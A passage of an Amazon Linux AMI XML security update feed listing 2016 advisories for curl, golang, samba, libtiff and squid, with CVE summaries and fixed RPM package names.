arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.111-2.6.7.2.68.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.111-2.6.7.2.68.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.111-2.6.7.2.68.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.111-2.6.7.2.68.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-730</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-730: medium priority package update for curl</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5421:
Use-after-free vulnerability in libcurl before 7.50.1 allows attackers to control which connection is used or possibly have unspecified other impact via unknown vectors.
1362199:
CVE-2016-5421 curl: Use of connection struct after free
CVE-2016-5420:
curl and libcurl before 7.50.1 do not check the client certificate when choosing the TLS connection to reuse, which might allow remote attackers to hijack the authentication of the connection by leveraging a previously created connection with a different client certificate.
1362190:
CVE-2016-5420 curl: Re-using connection with wrong client cert
CVE-2016-5419:
curl and libcurl before 7.50.1 do not prevent TLS session resumption when the client certificate has changed, which allows remote attackers to bypass intended restrictions by resuming a session.
1362183:
CVE-2016-5419 curl: TLS session resumption client cert bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5419" title="" id="CVE-2016-5419" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5420" title="" id="CVE-2016-5420" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5421" title="" id="CVE-2016-5421" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl-debuginfo" version="7.40.0" release="8.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.40.0-8.59.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.40.0" release="8.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.40.0-8.59.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="8.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.40.0-8.59.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.40.0" release="8.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.40.0-8.59.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.40.0" release="8.59.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.40.0-8.59.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="8.59.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.40.0-8.59.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="8.59.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.40.0-8.59.amzn1.i686.rpm</filename></package><package name="curl" version="7.40.0" release="8.59.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.40.0-8.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-731</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-731: medium priority package update for golang</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5386:
An input-validation flaw was discovered in the Go programming language built in CGI implementation, which set the environment variable &quot;HTTP_PROXY&quot; using the incoming &quot;Proxy&quot; HTTP-request header. The environment variable &quot;HTTP_PROXY&quot; is used by numerous web clients, including Go&#039;s net/http package, to specify a proxy server to use for HTTP and, in some cases, HTTPS requests. This meant that when a CGI-based web application ran, an attacker could specify a proxy server which the application then used for subsequent outgoing requests, allowing a man-in-the-middle attack.
1353798:
CVE-2016-5386 Go: sets environmental variable based on user supplied Proxy request header
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5386" title="" id="CVE-2016-5386" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-docs" version="1.5.3" release="1.22.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.5.3-1.22.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.5.3" release="1.22.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.5.3-1.22.amzn1.noarch.rpm</filename></package><package name="golang" version="1.5.3" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.5.3-1.22.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.5.3" release="1.22.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.5.3-1.22.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.5.3" release="1.22.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.5.3-1.22.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.5.3" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.5.3-1.22.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.5.3" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.5.3-1.22.amzn1.i686.rpm</filename></package><package name="golang" version="1.5.3" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.5.3-1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-732</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-732: medium priority package update for samba</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2119:
A flaw was found in the way Samba initiated signed DCE/RPC connections. A man-in-the-middle attacker could use this flaw to downgrade the connection to not use signing and therefore impersonate the server.
1351955:
CVE-2016-2119 samba: Client side SMB2/3 required signing can be downgraded
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2119" title="" id="CVE-2016-2119" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ctdb-tests" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-test-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-devel-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="ctdb-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-devel-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.2.10" release="7.34.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.2.10-7.34.amzn1.noarch.rpm</filename></package><package name="libsmbclient" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.2.10" release="7.34.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.2.10-7.34.amzn1.noarch.rpm</filename></package><package name="samba-test" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="ctdb-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-devel-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-test-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-devel-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.2.10-7.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-733</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-733: important priority package update for libtiff</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5320:
1346687:
CVE-2016-5320 libtiff: Out-of-bounds write in PixarLogDecode() function in tif_pixarlog.c
CVE-2016-3991:
1326249:
CVE-2016-3991 libtiff: out-of-bounds write in loadImage() function
CVE-2016-3990:
1326246:
CVE-2016-3990 libtiff: out-of-bounds write in horizontalDifference8()
CVE-2016-3945:
1325093:
CVE-2016-3945 libtiff: out-of-bounds write in the tiff2rgba tool
CVE-2016-3632:
1325095:
CVE-2016-3632 libtiff: out-of-bounds write in _TIFFVGetField function
CVE-2015-8784:
The NeXTDecode function in tif_next.c in LibTIFF allows remote attackers to cause a denial of service (out-of-bounds write) via a crafted TIFF image, as demonstrated by libtiff5.tif.
1301652:
CVE-2015-8784 libtiff: out-of-bound write in NeXTDecode()
CVE-2015-8783:
tif_luv.c in libtiff allows attackers to cause a denial of service (out-of-bounds reads) via a crafted TIFF image.
1301649:
CVE-2015-8781 CVE-2015-8782 CVE-2015-8783 libtiff: invalid assertion
CVE-2015-8782:
tif_luv.c in libtiff allows attackers to cause a denial of service (out-of-bounds writes) via a crafted TIFF image, a different vulnerability than CVE-2015-8781.
1301649:
CVE-2015-8781 CVE-2015-8782 CVE-2015-8783 libtiff: invalid assertion
CVE-2015-8781:
tif_luv.c in libtiff allows attackers to cause a denial of service (out-of-bounds write) via an invalid number of samples per pixel in a LogL compressed TIFF image, a different vulnerability than CVE-2015-8782.
1301649:
CVE-2015-8781 CVE-2015-8782 CVE-2015-8783 libtiff: invalid assertion
CVE-2015-8683:
The putcontig8bitCIELab function in tif_getimage.c in LibTIFF 4.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) via a packed TIFF image.
1294427:
CVE-2015-8683 libtiff: Out-of-bounds when reading CIE Lab image format files
CVE-2015-8668:
Heap-based buffer overflow in the PackBitsPreEncode function in tif_packbits.c in bmp2tiff in libtiff 4.0.6 and earlier allows remote attackers to execute arbitrary code or cause a denial of service via a large width field in a BMP image.
1294425:
CVE-2015-8668 libtiff: OOB read in bmp2tiff
CVE-2015-8665:
tif_getimage.c in LibTIFF 4.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) via the SamplesPerPixel tag in a TIFF image.
1294444:
CVE-2015-8665 libtiff: Out-of-bounds read in tif_getimage.c
CVE-2015-7554:
The _TIFFVGetField function in tif_dir.c in libtiff 4.0.6 allows attackers to cause a denial of service (invalid memory write and crash) or possibly have unspecified other impact via crafted field data in an extension tag in a TIFF image.
1294417:
CVE-2015-7554 libtiff: Invalid-write in _TIFFVGetField() when parsing some extension tags
CVE-2015-1547:
The NeXTDecode function in tif_next.c in LibTIFF allows remote attackers to cause a denial of service (uninitialized memory access) via a crafted TIFF image, as demonstrated by libtiff5.tif.
1190709:
CVE-2015-1547 libtiff: use of uninitialized memory in NeXTDecode
CVE-2014-9655:
The (1) putcontig8bitYCbCr21tile function in tif_getimage.c or (2) NeXTDecode function in tif_next.c in LibTIFF allows remote attackers to cause a denial of service (uninitialized memory access) via a crafted TIFF image, as demonstrated by libtiff-cvs-1.tif and libtiff-cvs-2.tif.
1190703:
CVE-2014-9655 libtiff: use of uninitialized memory in putcontig8bitYCbCr21tile and NeXTDecode
CVE-2014-9330:
A flaw was discovered in the bmp2tiff utility. By tricking a user into processing a specially crafted file, a remote attacker could exploit this flaw to cause a crash or memory corruption and, possibly, execute arbitrary code with the privileges of the user running the libtiff tool.
1177893:
CVE-2014-9330 libtiff: Out-of-bounds reads followed by a crash in bmp2tiff
CVE-2014-8130:
1185817:
CVE-2014-8130 libtiff: divide by zero in the tiffdither tool
CVE-2014-8129:
1185815:
CVE-2014-8129 libtiff: out-of-bounds read/write with malformed TIFF image in tiff2pdf
CVE-2014-8127:
1185805:
CVE-2014-8127 libtiff: out-of-bounds read with malformed TIFF image in multiple tools
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8127" title="" id="CVE-2014-8127" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8129" title="" id="CVE-2014-8129" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8130" title="" id="CVE-2014-8130" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9330" title="" id="CVE-2014-9330" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9655" title="" id="CVE-2014-9655" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1547" title="" id="CVE-2015-1547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7554" title="" id="CVE-2015-7554" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8665" title="" id="CVE-2015-8665" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8668" title="" id="CVE-2015-8668" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8683" title="" id="CVE-2015-8683" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8781" title="" id="CVE-2015-8781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8782" title="" id="CVE-2015-8782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8783" title="" id="CVE-2015-8783" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8784" title="" id="CVE-2015-8784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3632" title="" id="CVE-2016-3632" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3945" title="" id="CVE-2016-3945" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3990" title="" id="CVE-2016-3990" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3991" title="" id="CVE-2016-3991" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5320" title="" id="CVE-2016-5320" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-devel" version="4.0.3" release="25.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-25.27.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="25.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-25.27.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="25.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-25.27.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="25.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-25.27.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="25.27.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-25.27.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="25.27.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-25.27.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="25.27.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-25.27.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="25.27.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-25.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-734</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-734: important priority package update for compat-libtiff3</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5320:
1346687:
CVE-2016-5320 libtiff: Out-of-bounds write in PixarLogDecode() function in tif_pixarlog.c
CVE-2016-3990:
1326246:
CVE-2016-3990 libtiff: out-of-bounds write in horizontalDifference8()
CVE-2015-8784:
The NeXTDecode function in tif_next.c in LibTIFF allows remote attackers to cause a denial of service (out-of-bounds write) via a crafted TIFF image, as demonstrated by libtiff5.tif.
1301652:
CVE-2015-8784 libtiff: out-of-bound write in NeXTDecode()
CVE-2015-8783:
tif_luv.c in libtiff allows attackers to cause a denial of service (out-of-bounds reads) via a crafted TIFF image.
1301649:
CVE-2015-8781 CVE-2015-8782 CVE-2015-8783 libtiff: invalid assertion
CVE-2015-8782:
tif_luv.c in libtiff allows attackers to cause a denial of service (out-of-bounds writes) via a crafted TIFF image, a different vulnerability than CVE-2015-8781.
1301649:
CVE-2015-8781 CVE-2015-8782 CVE-2015-8783 libtiff: invalid assertion
CVE-2015-8781:
tif_luv.c in libtiff allows attackers to cause a denial of service (out-of-bounds write) via an invalid number of samples per pixel in a LogL compressed TIFF image, a different vulnerability than CVE-2015-8782.
1301649:
CVE-2015-8781 CVE-2015-8782 CVE-2015-8783 libtiff: invalid assertion
CVE-2015-8683:
The putcontig8bitCIELab function in tif_getimage.c in LibTIFF 4.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) via a packed TIFF image.
1294427:
CVE-2015-8683 libtiff: Out-of-bounds when reading CIE Lab image format files
CVE-2015-8665:
tif_getimage.c in LibTIFF 4.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) via the SamplesPerPixel tag in a TIFF image.
1294444:
CVE-2015-8665 libtiff: Out-of-bounds read in tif_getimage.c
CVE-2015-1547:
The NeXTDecode function in tif_next.c in LibTIFF allows remote attackers to cause a denial of service (uninitialized memory access) via a crafted TIFF image, as demonstrated by libtiff5.tif.
1190709:
CVE-2015-1547 libtiff: use of uninitialized memory in NeXTDecode
CVE-2014-9655:
The (1) putcontig8bitYCbCr21tile function in tif_getimage.c or (2) NeXTDecode function in tif_next.c in LibTIFF allows remote attackers to cause a denial of service (uninitialized memory access) via a crafted TIFF image, as demonstrated by libtiff-cvs-1.tif and libtiff-cvs-2.tif.
1190703:
CVE-2014-9655 libtiff: use of uninitialized memory in putcontig8bitYCbCr21tile and NeXTDecode
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9655" title="" id="CVE-2014-9655" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1547" title="" id="CVE-2015-1547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8665" title="" id="CVE-2015-8665" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8683" title="" id="CVE-2015-8683" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8781" title="" id="CVE-2015-8781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8782" title="" id="CVE-2015-8782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8783" title="" id="CVE-2015-8783" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8784" title="" id="CVE-2015-8784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3990" title="" id="CVE-2016-3990" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5320" title="" id="CVE-2016-5320" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="compat-libtiff3" version="3.9.4" release="18.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/compat-libtiff3-3.9.4-18.14.amzn1.x86_64.rpm</filename></package><package name="compat-libtiff3-debuginfo" version="3.9.4" release="18.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/compat-libtiff3-debuginfo-3.9.4-18.14.amzn1.x86_64.rpm</filename></package><package name="compat-libtiff3" version="3.9.4" release="18.14.amzn1" epoch="0" arch="i686"><filename>Packages/compat-libtiff3-3.9.4-18.14.amzn1.i686.rpm</filename></package><package name="compat-libtiff3-debuginfo" version="3.9.4" release="18.14.amzn1" epoch="0" arch="i686"><filename>Packages/compat-libtiff3-debuginfo-3.9.4-18.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-735</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-735: medium priority package update for squid</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5408:
It was found that the fix for CVE-2016-4051 released via RHSA-2016:1138 did not properly prevent the stack overflow in the munge_other_line() function. A remote attacker could send specially crafted data to the Squid proxy, which would exploit the cachemgr CGI utility, possibly triggering execution of arbitrary code.
1359203:
CVE-2016-5408 squid: Buffer overflow vulnerability in cachemgr.cgi tool
CVE-2016-4051:
A buffer overflow flaw was found in the way the Squid cachemgr.cgi utility processed remotely relayed Squid input. When the CGI interface utility is used, a remote attacker could possibly use this flaw to execute arbitrary code.
1329126:
CVE-2016-4051 squid: buffer overflow in cachemgr.cgi
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4051" title="" id="CVE-2016-4051" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5408" title="" id="CVE-2016-5408" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.1.23" release="16.22.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.1.23-16.22.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.1.23" release="16.22.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.1.23-16.22.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.1.23" release="16.22.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.1.23-16.22.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.1.23" release="16.22.amzn1" epoch="7" 